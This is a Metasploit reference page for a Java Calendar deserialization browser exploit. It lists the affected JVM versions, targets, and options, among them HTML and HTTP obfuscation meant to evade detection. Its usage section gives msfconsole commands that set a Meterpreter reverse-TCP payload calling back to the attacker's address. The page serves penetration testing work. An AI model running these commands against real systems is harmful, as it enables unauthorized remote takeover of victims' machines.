Metasploit Penetration Testing Framework

modules / exploit / multi / browser / java_calendar_deserialize
OSVDB: CVE:
BID: MSB:
TEXT:

Sun Java Calendar Deserialization Exploit

This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).

Rank

  • Excellent

Authors

  • sf < stephen_fewer [at] harmonysecurity.com >
  • hdm < hdm [at] metasploit.com >

References

Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows x86 (Native Payload)
  • 2 - Mac OS X PPC (Native Payload)
  • 3 - Mac OS X x86 (Native Payload)
  • 4 - Linux x86 (Native Payload)

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/multi/browser/java_calendar_deserialize
msf exploit(java_calendar_deserialize) > show payloads
msf exploit(java_calendar_deserialize) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(java_calendar_deserialize) > set LHOST [MY IP ADDRESS]
msf exploit(java_calendar_deserialize) > exploit

Module Options

SRVHOST The local host to listen on. (default: 0.0.0.0)
SRVPORT The local port to listen on. (default: 8080)
SSL Negotiate SSL for incoming connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATH The URI to use for this exploit (default is random)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
WORKSPACE Specify the workspace for this module
HTML::base64 Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding Enable folding of HTTP headers
HTTP::junk_headers Enable insertion of random junk HTTP headers
TCP::max_send_size Maximum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)

Copyright © 2003-2010 Rapid7 LLC
Rapid7 Privacy Statement